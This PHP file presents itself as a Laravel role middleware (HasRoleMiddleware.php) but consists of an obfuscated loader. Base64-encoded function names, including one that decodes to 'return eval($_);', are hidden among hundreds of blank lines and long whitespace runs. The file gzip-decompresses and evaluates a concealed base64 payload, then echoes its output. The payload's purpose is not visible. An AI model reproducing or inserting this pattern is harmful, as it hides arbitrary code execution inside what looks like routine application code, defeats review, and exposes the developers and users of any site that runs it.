<?php 
        $__='printf';$_='Loading app/Http/Middleware/HasRoleMiddleware.php';
        







































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtmltvozgUgN8j7X/Iw0h0tKMWSNMWRXkItBjIDl0gwcBLBSaBFBOYIQmQX78m5Drdama0q5V25M8yBuNz8fGxHxK63ZYPL4Qhk39dLFdzZrB73DNk/Dy/UVar/ObzIgzxrPS/zm4UvzAzPDv1XOdx3pWwXxTX19fMoLNX3P2tQwst3yudJuO6/yLDNz2MwwmFC7mFB56GzK7rlKU/xH5XDLsUCoXya8Kg1GZDR1urwOZdWGaaLMydOrlvD01yarbH9QsNFYVCoVAoFAqF8n+D/pxBoVAovy5M4Bezu9uXcIaycMYMaEQoFAqFQvlHXH4qIUX52oUcRj0xdvlpZDhi6TzFbKiIaAJx4oEKh7xce5NiLC3trWeJjwEQtqGj4ecy5xCRsWBVhJDLg1RmPbtSQ8UsHVnDyLGJXuN+LzdBQGZ9aKMpsOsA4i3i8SbAlR7wJg4UHU1TodjZSfXCdfSt+hTHiNM2AbB1H5oJaXsusSsti7EqjSJVevgyjrKovc8iC8jrxl+VtCrAa5cXVj7sL1Xl6MtaWox248/lDEWMUSqvVElE35kLGW/WniNznqOzR10LcUTmVruQjVS5OsZnLFdaACqOzHXtOiY+xHWa2lUI7W0oJXeqFL9vsydugqWO5+/rSXxix+2ZFvGnDPg+iXPS+Lj2nPjSv8NfZO/r2iIgrBFvPzhPuAgUu4ldHAIbWYrJIrmyPGjmRM9reObbycZDuyaKyLlplbu1mIaw/xoCssYLMXNhn6zfNDvNfZSg430ZGXy1QT279qxREqT2LYnNXt9hrZsq5t5ilLmOzfokcf+Y9F99YL/6dZSPLfH+4MupmnXAVxjVI0GVmzya3j2nIQ6J7HOZfTO21a2dcmX1Z5O3jpqNLfZ3H8hbA/b7uxy1IuI7aZ3P79jd6SN5YnIovY000MczxTjX/Xf2BRXYRbOfZm/etdWF2gYtjUx/HG3Hk/O4tHVunMkpbOTBqtl3b/0D8iLoaez40Sh1Kbl4f9AxN3JBioZDZtDp/PeH03DXXu2fPg5+RvxM9kcEP5wMXjHNlfl0NEu/CaPlZ74Ju8ypq4skblPq4+AvpL3T0g==';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































































































































                                                                                                                                                                                                                     $________;
